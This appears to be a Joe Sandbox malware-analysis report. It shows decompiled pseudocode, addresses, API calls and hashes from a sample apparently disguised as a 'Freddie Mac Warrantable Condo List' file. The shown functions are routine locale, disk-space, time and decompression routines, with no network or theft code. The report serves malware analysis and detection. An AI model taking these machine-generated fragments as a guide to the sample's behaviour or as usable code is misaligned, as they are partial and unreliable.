0x0040a528
0x0040a52d
0x0040a537
0x0040a53e
0x0040a546
0x0040a558
0x0040a548
0x0040a549
0x00000000
0x0040a549
0x0040a539
0x0040a53b
0x00000000
0x0040a53b
0x00000000
0x0040a55f
0x0040a55f
0x0040a528
0x0040a526
0x0040a517
0x0040a564
0x0040a56a
0x0040a58e
0x0040a592
0x0040a5a3
0x0040a5b9
0x0040a5be
0x0040a5c4
0x0040a5da
0x0040a5df
0x0040a5e5
0x0040a5fb
0x0040a600
0x0040a60e
0x0040a60e
0x0040a615
0x0040a618
0x0040a61b
0x0040a630

APIs

IsValidLocale.KERNEL32(?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A576
GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A592
GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A5A3

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Locale$Info$Valid
String ID:
API String ID: 1826331170-0
Opcode ID: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
Instruction ID: 92a11a0233c3b219485afac9e49f2dea99407596d6f7a83949ef3a6145fdf69e
Opcode Fuzzy Hash: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
Instruction Fuzzy Hash: 3831AE70A00308ABDF20DB64DD81BDEBBB9FB48701F5005BBA508B32D1D6395E90CE1A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4DC, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A4DC(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				WCHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E004095A8(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E004095A8(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

0x0041a4e3
0x0041a4e8
0x0041a4ea
0x0041a4ea
0x0041a4fd
0x0041a50c
0x0041a50f
0x0041a51c
0x0041a51f
0x0041a524
0x0041a527
0x0041a529
0x0041a536
0x0041a539
0x0041a53e
0x0041a541
0x0041a543
0x0041a54c

APIs

GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0041A4FD

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
Instruction ID: 14c90aad059d6341cd8fbca9d1c94cd423dd62e4f1f0ed92fc39ecac232c4210
Opcode Fuzzy Hash: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
Instruction Fuzzy Hash: 7711C0B5A01209AFDB04CF9ACD819EFB7F9EFC8304B14C569A505E7255E6319E018B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041E034, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E034(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				short _v516;
				void* __ebp;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E00407E00(_t10, _t18);
				}
				return E00407BA8(_t10, _t5 - 1,  &_v516, _t19);
			}

0x0041e03f
0x0041e041
0x0041e052
0x0041e057
0x0041e059
0x00000000
0x0041e071
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
Instruction ID: c90943d4e22265a1f7ecf9aede9ac9faa011377f579ac525cbc4109061889d1c
Opcode Fuzzy Hash: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
Instruction Fuzzy Hash: C7E09235B0421427E314A55A9C86AE7725D9B48340F40457FBD05D7382EDB9AE8042E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E080, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041E080(int __eax, signed int __ecx, int __edx) {
				short _v16;
				signed int _t5;
				signed int _t10;

				_push(__ecx);
				_t10 = __ecx;
				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t10;
				} else {
					_t5 = _v16 & 0x0000ffff;
				}
				return _t5;
			}

0x0041e083
0x0041e084
0x0041e09a
0x0041e0a2
0x0041e09c
0x0041e09c
0x0041e09c
0x0041e0a8

APIs

GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
Instruction ID: 961adf842b5e4829a7f1cb68f4be235500f18d0b61d537998bbd462cca006134
Opcode Fuzzy Hash: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
Instruction Fuzzy Hash: 45D05EBA31923476E214915B6E85DB75ADCCBC87A2F14483BBE4CC6241D2A4CC46A275

Uniqueness

Uniqueness Score: -1.00%

Function 004AF218, Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004AF218(signed int __eax) {
				short _v8;
				signed int _t6;

				_t6 = GetLocaleInfoW(__eax & 0x0000ffff, 0x20001004,  &_v8, 2);
				if(_t6 <= 0) {
					return _t6 | 0xffffffff;
				}
				return _v8;
			}

0x004af22e
0x004af235
0x00000000
0x004af23c
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,004AF318), ref: 004AF22E

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
Instruction ID: 3cbbb47bc5e3852376f83ef88ad8e7e21f22c900a58d153b56eed97a123c5839
Opcode Fuzzy Hash: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
Instruction Fuzzy Hash: E8D0A5F55442087DF504C1DA5D82FB673DCD705374F500767F654C52C1D567EE015219

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3D8, Relevance: 1.5, APIs: 1, Instructions: 6
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C3D8() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}

0x0041c3dc
0x0041c3e8

APIs

GetLocalTime.KERNEL32 ref: 0041C3DC

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
Instruction ID: 79eafb11b28f80ce797d6e9fe134e5764476c7cb5db39d72cf417c4d7be8b418
Opcode Fuzzy Hash: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
Instruction Fuzzy Hash: DAA0122080582011D140331A0C0313530405900620FC40F55BCF8542D1E93D013440D7

Uniqueness

Uniqueness Score: -1.00%

Function 004255DC, Relevance: .5, Instructions: 545
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004255DC(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v25;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v64;
				char* _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v89;
				char _v96;
				signed int _v100;
				signed int _v104;
				short* _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				signed int _t370;
				void* _t375;
				signed int _t377;
				signed int _t381;
				signed int _t389;
				signed int _t395;
				signed int _t411;
				intOrPtr _t422;
				signed int _t426;
				signed int _t435;
				void* _t448;
				signed int _t458;
				char _t460;
				signed int _t474;
				char* _t503;
				signed int _t508;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t622;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 =  *((intOrPtr*)(_v8 + 0x10));
				_v24 = 0;
				_v32 = (1 <<  *(_v8 + 8)) - 1;
				_v36 = (1 <<  *(_v8 + 4)) - 1;
				_v40 =  *_v8;
				_t617 =  *((intOrPtr*)(_v8 + 0x34));
				_t474 =  *(_v8 + 0x44);
				_v44 =  *((intOrPtr*)(_v8 + 0x38));
				_v48 =  *((intOrPtr*)(_v8 + 0x3c));
				_v52 =  *((intOrPtr*)(_v8 + 0x40));
				_v56 =  *((intOrPtr*)(_v8 + 0x48));
				_v60 =  *((intOrPtr*)(_v8 + 0x2c));
				_v64 =  *((intOrPtr*)(_v8 + 0x30));
				_v68 =  *((intOrPtr*)(_v8 + 0x1c));
				_v72 =  *((intOrPtr*)(_v8 + 0xc));
				_t616 =  *((intOrPtr*)(_v8 + 0x28));
				_v128 =  *((intOrPtr*)(_v8 + 0x20));
				_v124 =  *((intOrPtr*)(_v8 + 0x24));
				_v120 = _v12;
				_v136 =  *((intOrPtr*)(_v8 + 0x14));
				_v132 =  *((intOrPtr*)(_v8 + 0x18));
				 *_a4 = 0;
				if(_v56 == 0xffffffff) {
					return 0;
				}
				__eflags = _v72;
				if(_v72 == 0) {
					_v68 =  &_v76;
					_v72 = 1;
					_v76 =  *((intOrPtr*)(_v8 + 0x4c));
				}
				__eflags = _v56 - 0xfffffffe;
				if(_v56 != 0xfffffffe) {
					L12:
					_v108 = _v16 + _v24;
					while(1) {
						__eflags = _v56;
						if(_v56 == 0) {
							break;
						}
						__eflags = _v24 - _a8;
						if(_v24 < _a8) {
							_t458 = _t616 - _t617;
							__eflags = _t458 - _v72;
							if(_t458 >= _v72) {
								_t458 = _t458 + _v72;
								__eflags = _t458;
							}
							_t460 =  *((intOrPtr*)(_v68 + _t458));
							 *((char*)(_v68 + _t616)) = _t460;
							 *_v108 = _t460;
							_v24 = _v24 + 1;
							_v108 = _v108 + 1;
							_t616 = _t616 + 1;
							__eflags = _t616 - _v72;
							if(_t616 == _v72) {
								_t616 = 0;
								__eflags = 0;
							}
							_t116 =  &_v56;
							 *_t116 = _v56 - 1;
							__eflags =  *_t116;
							continue;
						}
						break;
					}
					__eflags = _t616;
					if(_t616 != 0) {
						_v25 =  *((intOrPtr*)(_v68 + _t616 - 1));
					} else {
						_v25 =  *((intOrPtr*)(_v68 + _v72 - 1));
					}
					__eflags = 0;
					_v116 = 0;
					_v112 = 0;
					while(1) {
						L24:
						_v108 = _v16 + _v24;
						__eflags = _v24 - _a8;
						if(_v24 >= _a8) {
							break;
						} else {
							goto L25;
						}
						while(1) {
							L25:
							_v88 = _v24 + _v60 & _v32;
							__eflags = _v116;
							if(_v116 != 0) {
								break;
							}
							__eflags = _v112;
							if(_v112 == 0) {
								_t370 = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88,  &_v136);
								__eflags = _t370;
								if(_t370 != 0) {
									_t375 = E00425334(_t474 + _t474 + _v20 + 0x180,  &_v136);
									__eflags = _t375 != 1;
									if(_t375 != 1) {
										_v52 = _v48;
										_v48 = _v44;
										_v44 = _t617;
										__eflags = _t474 - 7;
										if(__eflags >= 0) {
											_t377 = 0xa;
										} else {
											_t377 = 7;
										}
										_t474 = _t377;
										_v56 = E004254E4(_v20 + 0x664, _v88,  &_v136, __eflags);
										_t503 =  &_v136;
										__eflags = _v56 - 4;
										if(_v56 >= 4) {
											_t381 = 3;
										} else {
											_t381 = _v56;
										}
										_v100 = E004253BC((_t381 << 6) + (_t381 << 6) + _v20 + 0x360, _t503, 6);
										__eflags = _v100 - 4;
										if(_v100 < 4) {
											_t618 = _v100;
										} else {
											_v104 = (_v100 >> 1) - 1;
											_t524 = _v104;
											_t622 = (_v100 & 0x00000001 | 0x00000002) << _v104;
											__eflags = _v100 - 0xe;
											if(_v100 >= 0xe) {
												_t395 = E004252D4( &_v136, _t524, _v104 + 0xfffffffc);
												_t618 = _t622 + (_t395 << 4) + E00425400(_v20 + 0x644,  &_v136, 4);
											} else {
												_t618 = _t622 + E00425400(_t622 + _t622 + _v20 + 0x560 - _v100 + _v100 + 0xfffffffe,  &_v136, _v104);
											}
										}
										_t617 = _t618 + 1;
										__eflags = _t617;
										if(_t617 != 0) {
											L82:
											_v56 = _v56 + 2;
											__eflags = _t617 - _v64;
											if(_t617 <= _v64) {
												__eflags = _v72 - _v64 - _v56;
												if(_v72 - _v64 <= _v56) {
													_v64 = _v72;
												} else {
													_v64 = _v64 + _v56;
												}
												while(1) {
													_t389 = _t616 - _t617;
													__eflags = _t389 - _v72;
													if(_t389 >= _v72) {
														_t389 = _t389 + _v72;
														__eflags = _t389;
													}
													_v25 =  *((intOrPtr*)(_v68 + _t389));
													 *((char*)(_v68 + _t616)) = _v25;
													_t616 = _t616 + 1;
													__eflags = _t616 - _v72;
													if(_t616 == _v72) {
														_t616 = 0;
														__eflags = 0;
													}
													_v56 = _v56 - 1;
													 *_v108 = _v25;
													_v24 = _v24 + 1;
													_v108 = _v108 + 1;
													__eflags = _v56;
													if(_v56 == 0) {
														break;
													}
													__eflags = _v24 - _a8;
													if(_v24 < _a8) {
														continue;
													}
													break;
												}
												L93:
												__eflags = _v24 - _a8;
												if(_v24 < _a8) {
													continue;
												}
												goto L94;
											}
											return 1;
										} else {
											_v56 = 0xffffffff;
											goto L94;
										}
									}
									_t411 = E00425334(_t474 + _t474 + _v20 + 0x198,  &_v136);
									__eflags = _t411;
									if(_t411 != 0) {
										__eflags = E00425334(_t474 + _t474 + _v20 + 0x1b0,  &_v136);
										if(__eflags != 0) {
											__eflags = E00425334(_t474 + _t474 + _v20 + 0x1c8,  &_v136);
											if(__eflags != 0) {
												_t422 = _v52;
												_v52 = _v48;
											} else {
												_t422 = _v48;
											}
											_v48 = _v44;
										} else {
											_t422 = _v44;
										}
										_v44 = _t617;
										_t617 = _t422;
										L65:
										_v56 = E004254E4(_v20 + 0xa68, _v88,  &_v136, __eflags);
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t426 = 0xb;
										} else {
											_t426 = 8;
										}
										_t474 = _t426;
										goto L82;
									}
									__eflags = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88 + 0x1e0,  &_v136);
									if(__eflags != 0) {
										goto L65;
									}
									__eflags = _v64;
									if(_v64 != 0) {
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t508 = 0xb;
										} else {
											_t508 = 9;
										}
										_t474 = _t508;
										_t435 = _t616 - _t617;
										__eflags = _t435 - _v72;
										if(_t435 >= _v72) {
											_t435 = _t435 + _v72;
											__eflags = _t435;
										}
										_v25 =  *((intOrPtr*)(_v68 + _t435));
										 *((char*)(_v68 + _t616)) = _v25;
										_t616 = _t616 + 1;
										__eflags = _t616 - _v72;
										if(_t616 == _v72) {
											_t616 = 0;
											__eflags = 0;
										}
										 *_v108 = _v25;
										_v24 = _v24 + 1;
										__eflags = _v64 - _v72;
										if(_v64 < _v72) {
											_v64 = _v64 + 1;
										}
										goto L24;
									}
									return 1;
								}
								_t448 = (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + _v20 + 0xe6c;
								__eflags = _t474 - 7;
								if(__eflags < 0) {
									_v25 = E00425444(_t448,  &_v136, __eflags);
								} else {
									_v96 = _t616 - _t617;
									__eflags = _v96 - _v72;
									if(__eflags >= 0) {
										_t161 =  &_v96;
										 *_t161 = _v96 + _v72;
										__eflags =  *_t161;
									}
									_v89 =  *((intOrPtr*)(_v68 + _v96));
									_v25 = E00425470(_t448, _v89,  &_v136, __eflags);
								}
								 *_v108 = _v25;
								_v24 = _v24 + 1;
								_v108 = _v108 + 1;
								__eflags = _v64 - _v72;
								if(_v64 < _v72) {
									_t180 =  &_v64;
									 *_t180 = _v64 + 1;
									__eflags =  *_t180;
								}
								 *((char*)(_v68 + _t616)) = _v25;
								_t616 = _t616 + 1;
								__eflags = _t616 - _v72;
								if(_t616 == _v72) {
									_t616 = 0;
									__eflags = 0;
								}
								__eflags = _t474 - 4;
								if(_t474 >= 4) {
									__eflags = _t474 - 0xa;
									if(_t474 >= 0xa) {
										_t474 = _t474 - 6;
									} else {
										_t474 = _t474 - 3;
									}
								} else {
									_t474 = 0;
								}
								goto L93;
							}
							return 1;
						}
						return _v116;
					}
					L94:
					 *((intOrPtr*)(_v8 + 0x20)) = _v128;
					 *((intOrPtr*)(_v8 + 0x24)) = _v124;
					 *((intOrPtr*)(_v8 + 0x28)) = _t616;
					 *((intOrPtr*)(_v8 + 0x2c)) = _v60 + _v24;
					 *((intOrPtr*)(_v8 + 0x30)) = _v64;
					 *((intOrPtr*)(_v8 + 0x34)) = _t617;
					 *((intOrPtr*)(_v8 + 0x38)) = _v44;
					 *((intOrPtr*)(_v8 + 0x3c)) = _v48;
					 *((intOrPtr*)(_v8 + 0x40)) = _v52;
					 *(_v8 + 0x44) = _t474;
					 *((intOrPtr*)(_v8 + 0x48)) = _v56;
					 *((char*)(_v8 + 0x4c)) = _v76;
					 *((intOrPtr*)(_v8 + 0x14)) = _v136;
					 *((intOrPtr*)(_v8 + 0x18)) = _v132;
					 *_a4 = _v24;
					__eflags = 0;
					return 0;
				}
				_v80 = (0x300 <<  *(_v8 + 4) + _v40) + 0x736;
				_v84 = 0;
				_v108 = _v20;
				__eflags = _v84 - _v80;
				if(_v84 >= _v80) {
					L7:
					_v52 = 1;
					_v48 = 1;
					_v44 = 1;
					_t617 = 1;
					_v60 = 0;
					_v64 = 0;
					_t474 = 0;
					_t616 = 0;
					 *((char*)(_v68 + _v72 - 1)) = 0;
					E00425294( &_v136);
					__eflags = _v116;
					if(_v116 != 0) {
						return _v116;
					}
					__eflags = _v112;
					if(_v112 == 0) {
						__eflags = 0;
						_v56 = 0;
						goto L12;
					} else {
						return 1;
					}
				} else {
					goto L6;
				}
				do {
					L6:
					 *_v108 = 0x400;
					_v84 = _v84 + 1;
					_v108 = _v108 + 2;
					__eflags = _v84 - _v80;
				} while (_v84 < _v80);
				goto L7;
			}

0x004255e8
0x004255eb
0x004255ee
0x004255f9
0x004255fc
0x0042560d
0x0042561e
0x00425626
0x0042562f
0x00425635
0x0042563b
0x00425644
0x0042564d
0x00425656
0x0042565f
0x00425668
0x00425671
0x0042567a
0x00425683
0x00425689
0x00425692
0x00425698
0x004256a1
0x004256af
0x004256b5
0x004256bb
0x00000000
0x004256bd
0x004256c4
0x004256c8
0x004256cd
0x004256d0
0x004256dd
0x004256dd
0x004256e0
0x004256e4
0x00425785
0x0042578e
0x004257c3
0x004257c3
0x004257c7
0x00000000
0x00000000
0x004257cc
0x004257cf
0x00425795
0x00425797
0x0042579a
0x0042579c
0x0042579c
0x0042579c
0x004257a9
0x004257aa
0x004257b0
0x004257b2
0x004257b5
0x004257b8
0x004257b9
0x004257bc
0x004257be
0x004257be
0x004257be
0x004257c0
0x004257c0
0x004257c0
0x00000000
0x004257c0
0x00000000
0x004257cf
0x004257d1
0x004257d3
0x004257eb
0x004257d5
0x004257df
0x004257df
0x004257f0
0x004257f2
0x004257f5
0x004257f8
0x004257f8
0x00425801
0x00425807
0x0042580a
0x00000000
0x00000000
0x00000000
0x00000000
0x00425810
0x00425810
0x00425819
0x0042581c
0x00425820
0x00000000
0x00000000
0x0042582a
0x0042582e
0x00425851
0x00425856
0x00425858
0x00425931
0x00425936
0x00425937
0x00425a77
0x00425a7d
0x00425a80
0x00425a83
0x00425a86
0x00425a8f
0x00425a88
0x00425a88
0x00425a88
0x00425a94
0x00425aac
0x00425aaf
0x00425ab5
0x00425ab9
0x00425ac0
0x00425abb
0x00425abb
0x00425abb
0x00425adc
0x00425adf
0x00425ae3
0x00425b5c
0x00425ae5
0x00425aeb
0x00425aee
0x00425afa
0x00425afc
0x00425b00
0x00425b36
0x00425b58
0x00425b02
0x00425b26
0x00425b26
0x00425b00
0x00425b5f
0x00425b5f
0x00425b60
0x00425b6b
0x00425b6b
0x00425b6f
0x00425b72
0x00425b84
0x00425b87
0x00425b94
0x00425b89
0x00425b8c
0x00425b8c
0x00425b97
0x00425b99
0x00425b9b
0x00425b9e
0x00425ba0
0x00425ba0
0x00425ba0
0x00425ba9
0x00425bb2
0x00425bb5
0x00425bb6
0x00425bb9
0x00425bbb
0x00425bbb
0x00425bbb
0x00425bbd
0x00425bc6
0x00425bc8
0x00425bcb
0x00425bce
0x00425bd2
0x00000000
0x00000000
0x00425bd7
0x00425bda
0x00000000
0x00000000
0x00000000
0x00425bda
0x00425bdc
0x00425bdf
0x00425be2
0x00000000
0x00000000
0x00000000
0x00425be2
0x00000000
0x00425b62
0x00425b62
0x00000000
0x00425b62
0x00425b60
0x0042594f
0x00425954
0x00425956
0x00425a06
0x00425a08
0x00425a26
0x00425a28
0x00425a2f
0x00425a35
0x00425a2a
0x00425a2a
0x00425a2a
0x00425a3b
0x00425a0a
0x00425a0a
0x00425a0a
0x00425a3e
0x00425a41
0x00425a43
0x00425a59
0x00425a5c
0x00425a5f
0x00425a68
0x00425a61
0x00425a61
0x00425a61
0x00425a6d
0x00000000
0x00425a6d
0x0042597d
0x0042597f
0x00000000
0x00000000
0x00425985
0x00425989
0x00425995
0x00425998
0x004259a1
0x0042599a
0x0042599a
0x0042599a
0x004259a6
0x004259aa
0x004259ac
0x004259af
0x004259b1
0x004259b1
0x004259b1
0x004259ba
0x004259c3
0x004259c6
0x004259c7
0x004259ca
0x004259cc
0x004259cc
0x004259cc
0x004259d4
0x004259d6
0x004259dc
0x004259df
0x004259e5
0x004259e5
0x00000000
0x004259df
0x00000000
0x0042598b
0x00425888
0x0042588d
0x00425890
0x004258d1
0x00425892
0x00425896
0x0042589c
0x0042589f
0x004258a4
0x004258a4
0x004258a4
0x004258a4
0x004258b0
0x004258c1
0x004258c1
0x004258da
0x004258dc
0x004258df
0x004258e5
0x004258e8
0x004258ea
0x004258ea
0x004258ea
0x004258ea
0x004258f3
0x004258f6
0x004258f7
0x004258fa
0x004258fc
0x004258fc
0x004258fc
0x004258fe
0x00425901
0x0042590a
0x0042590d
0x00425917
0x0042590f
0x0042590f
0x0042590f
0x00425903
0x00425903
0x00425903
0x00000000
0x00425901
0x00000000
0x00425830
0x00000000
0x00425822
0x00425be8
0x00425bee
0x00425bf7
0x00425bfd
0x00425c09
0x00425c12
0x00425c18
0x00425c21
0x00425c2a
0x00425c33
0x00425c39
0x00425c42
0x00425c4b
0x00425c57
0x00425c60
0x00425c69
0x00425c6b
0x00000000
0x00425c6b
0x00425701
0x00425704
0x0042570c
0x00425712
0x00425715
0x0042572e
0x00425735
0x00425738
0x0042573b
0x0042573e
0x00425740
0x00425745
0x00425748
0x00425750
0x00425752
0x0042575d
0x00425762
0x00425766
0x00000000
0x00425768
0x00425770
0x00425774
0x00425780
0x00425782
0x00000000
0x00425776
0x00000000
0x00425776
0x00000000
0x00000000
0x00000000
0x00425717
0x00425717
0x0042571a
0x0042571f
0x00425722
0x00425729
0x00425729
0x00000000

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction ID: 61b87226b6134f121ca287378b5d435c32ef56f555bf4f4916e7d2b2d6d49e77
Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction Fuzzy Hash: E932E274E00629DFCB14CF99D981AEDBBB2BF88314F64816AD815AB341D734AE42CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004323DC, Relevance: .4, Instructions: 408
COMMONCrypto

